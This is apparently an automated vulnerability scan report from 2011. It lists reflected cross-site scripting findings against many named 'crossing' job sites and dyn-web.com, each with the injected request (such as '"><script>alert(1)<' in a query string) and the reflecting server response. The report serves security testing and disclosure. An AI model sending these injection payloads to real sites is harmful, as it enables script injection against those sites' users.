| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:25:17 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=t7apdouasj Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:18 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:18 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:18 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:18 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:18 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:18 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:18 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 111881 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.designing |
| Path: | / |
| GET /?e77f8"><script>alert(1)< Host: www.designingcrossing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:25:26 GMT Server: Apache/2.2.3 (Red Hat) Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=voh1qpdojh Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:26 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:26 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:26 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:26 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:26 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:26 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:26 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 122755 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.diversity |
| Path: | / |
| GET /?536ad"><script>alert(1)< Host: www.diversitycrossing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:25:32 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=mvngm9tnor Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:32 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:32 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:32 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:32 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:32 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:32 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:32 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 135910 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.dotnetcrossing |
| Path: | / |
| GET /?5ff65"><script>alert(1)< Host: www.dotnetcrossing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:25:34 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=tcm1i9njoj Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:34 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:34 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:34 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:34 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:34 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:34 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:34 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 111425 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Firm |
| Host: | http://www.dyn-web.com |
| Path: | /bus/terms.html |
| GET /bused13c<a>aca04e604f5/terms.html HTTP/1.1 Host: www.dyn-web.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 404 Not Found Date: Fri, 21 Jan 2011 19:34:47 GMT Server: Apache/1.3.42 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8e-fips-rhel5 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Set-Cookie: PHPSESSID=f71522e635 Connection: close Content-Type: text/html Content-Length: 5456 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Page No ...[SNIP]... <a>aca04e604f5/">Bused13c<a>aca04e604f5</a> ...[SNIP]... |
| Severity: | High |
| Confidence: | Firm |
| Host: | http://www.dyn-web.com |
| Path: | /bus/terms.html |
| GET /bus60a0a"><a>7585948a4e/terms.html HTTP/1.1 Host: www.dyn-web.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 404 Not Found Date: Fri, 21 Jan 2011 19:34:39 GMT Server: Apache/1.3.42 (Unix) mod_gzip/1.3.26.1a mod_log_bytes/1.2 mod_bwlimited/1.4 mod_auth_passthrough/1.8 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.8e-fips-rhel5 Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Set-Cookie: PHPSESSID=1089af8a82 Connection: close Content-Type: text/html Content-Length: 5458 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Page No ...[SNIP]... <a href="/bus60a0a"><a>7585948a4e/"> ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.ecommerce |
| Path: | / |
| GET /?b4aad"><script>alert(1)< Host: www.ecommercecrossing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:25:45 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=qgp06lth3p Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:45 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:45 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:45 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:45 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:45 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:45 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:45 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 123070 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.editingcr |
| Path: | / |
| GET /?8a2ad"><script>alert(1)< Host: www.editingcrossing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:25:53 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=40ci97cu8v Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:53 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:53 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:53 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:53 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:53 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:53 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:53 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 114144 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.education |
| Path: | / |
| GET /?53272"><script>alert(1)< Host: www.educationcrossing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:25:55 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=5m4pm2cqvr Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:25:55 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:25:55 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:25:55 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:25:55 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:25:55 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:25:55 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:25:55 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 112789 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.employmen |
| Path: | / |
| GET /?c9d32"><script>alert(1)< Host: www.employmentcrossing Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:26:03 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=qagf6dbtbo Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:03 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:03 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:03 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:03 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:03 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:03 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:03 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 103836 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.energycrossing |
| Path: | / |
| GET /?d8299"><script>alert(1)< Host: www.energycrossing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:26:06 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=noidta3npd Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:06 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:06 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:06 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:06 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:06 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:06 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:06 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 117890 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.engineeri |
| Path: | / |
| GET /?2ce7e"><script>alert(1)< Host: www.engineeringcrossing Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:26:14 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=aut4ejh39i Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:14 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:14 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:14 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:14 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:14 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:14 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:14 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 136570 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.entryleve |
| Path: | / |
| GET /?a1390"><script>alert(1)< Host: www.entrylevelcrossing Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:26:17 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=rvmtdhrtap Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:17 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:17 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:17 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:17 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:17 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:17 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:17 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 149274 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.environme |
| Path: | / |
| GET /?47df8"><script>alert(1)< Host: www.environmentalcrossing Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:26:14 GMT Server: Apache/2.2.3 (Red Hat) Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=q47km4obkv Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:14 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:14 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:14 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:14 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:14 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:14 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:14 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 103948 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.environme |
| Path: | / |
| GET /?9ccd0"><script>alert(1)< Host: www.environmentalsaf Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:26:22 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=0erqag1b3v Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:22 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:22 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:22 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:22 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:22 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:22 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:22 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 109501 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.erpcrossing |
| Path: | / |
| GET /?9c8ac"><script>alert(1)< Host: www.erpcrossing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:26:22 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=s019do29bs Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:23 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:23 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:23 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:23 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:23 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:23 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:23 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 115915 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.execcrossing |
| Path: | / |
| GET /?58b15"><script>alert(1)< Host: www.execcrossing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:26:28 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=9pmt5q5vtv Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:28 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:28 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:28 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:28 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:28 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:28 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:28 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 130398 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.facilitie |
| Path: | / |
| GET /?30174"><script>alert(1)< Host: www.facilitiescrossing Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:26:59 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=9tjnfteftb Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:26:59 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:26:59 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:26:59 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:26:59 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:26:59 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:26:59 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:26:59 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 117526 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.financial |
| Path: | / |
| GET /?8c380"><script>alert(1)< Host: www.financialservice Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
| HTTP/1.1 200 OK Date: Fri, 21 Jan 2011 22:27:00 GMT Server: Apache Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Pragma: no-cache Content-Type: text/html; charset=UTF-8 Set-Cookie: PHPSESSID=mka5rd1b1u Set-Cookie: flagimg=UnitedStates.gif; expires=Fri, 28-Jan-2011 22:27:00 GMT Set-Cookie: useripcountry=277; expires=Fri, 28-Jan-2011 22:27:00 GMT Set-Cookie: useripstate=3896; expires=Fri, 28-Jan-2011 22:27:00 GMT Set-Cookie: useripcity=2655979; expires=Fri, 28-Jan-2011 22:27:00 GMT Set-Cookie: usercountry=277; expires=Fri, 28-Jan-2011 22:27:00 GMT Set-Cookie: userstate=3896; expires=Fri, 28-Jan-2011 22:27:00 GMT Set-Cookie: usercity=2655979; expires=Fri, 28-Jan-2011 22:27:00 GMT Set-Cookie: regioninfo=2655979%7E32 Connection: close Via: 1.1 AN-0016020122545304 Content-Length: 117803 <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html> <head> <script language="javascript"> var HTTP = ''; var LCWAWINDOWNAME = ''; var include_ ...[SNIP]... <input type="hidden" name="clslogin_hdnlo ...[SNIP]... |
| Severity: | High |
| Confidence: | Certain |
| Host: | http://www.foodservi |
| Path: | / |
| GET /?298f0"><script>alert(1)< Host: www.foodservicescrossing Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
